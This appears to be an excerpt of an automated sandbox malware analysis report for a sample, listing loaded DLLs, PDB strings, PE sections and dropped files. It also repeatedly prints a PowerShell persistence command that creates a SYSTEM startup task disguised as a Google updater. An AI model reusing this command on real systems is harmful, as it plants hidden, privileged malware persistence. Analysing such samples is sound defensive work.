            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: hfi47s4wOT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553754278.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581652788.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554227347.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582430105.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Update.exe, 0000001E.00000003.2548897074.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576594870.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550044909.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577861683.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548464605.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576123019.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000016.00000000.1850988124.00000000004D2000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551603162.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579808570.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553323331.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581265248.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554435598.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582580094.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Update.exe, 0000001E.00000003.2546679712.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573261140.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549367463.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577316736.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551970873.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580209702.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551291268.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579340928.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553150928.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580922538.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Ce.pdbl source: powershell.exe, 0000001F.00000002.2588953334.0000000007B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548615916.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576253902.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550458834.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578357507.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548099904.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575850140.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548755612.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576414574.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2552773241.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580511161.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000016.00000000.1850988124.00000000004D2000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550786908.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578871941.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2555005689.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582961103.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549202050.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577178272.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Update.exe, 0000001E.00000003.2551434668.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579477421.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550304212.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578131812.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548266259.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575973679.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2552306150.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580389434.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Update.exe, 0000001E.00000003.2546679712.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573261140.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Update.exe, 0000001E.00000003.2549872399.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577736838.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553900158.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581951383.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.pdb source: powershell.exe, 0000001F.00000002.2587901578.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000001F.00000002.2587901578.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Update.exe, 0000001E.00000003.2550595462.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578702786.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550182365.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577983295.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.pdbq source: powershell.exe, 0000001F.00000002.2588673938.0000000007B51000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2555177021.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2583201383.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550964956.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579007923.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551750599.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580016797.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551166924.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579170809.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Update.exe, 0000001E.00000003.2549044276.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576749520.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554072215.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582276254.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549736844.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577597124.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549571981.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577442046.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553606718.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581482803.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554703024.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582709014.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cmkpzahpq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            Source: api-ms-win-core-console-l1-1-0.dll.30.drStatic PE information: 0xA9D30DED [Wed Apr 14 15:12:45 2060 UTC]
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
            Source: python312.dll.30.drStatic PE information: section name: PyRuntim
            Source: VCRUNTIME140.dll.30.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.30.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.30.drStatic PE information: section name: .00cfg
            Source: tmp11jjwww2.exe.33.drStatic PE information: section name: .xdata
            Source: VCRUNTIME140.dll.34.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.34.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.34.drStatic PE information: section name: .00cfg
            Source: python312.dll.34.drStatic PE information: section name: PyRuntim
            Source: tmpgtnhdrk0.exe.35.drStatic PE information: section name: .xdata
            Source: updater.exe.39.drStatic PE information: section name: .xdata
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003E0DC6 push ecx; ret 19_2_003E0DD9

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifFile created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeFile created: C:\Users\user\AppData\Local\Temp\nfngdkpnjkmg.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifFile created: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\python312.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\python3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\_bz2.pydJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
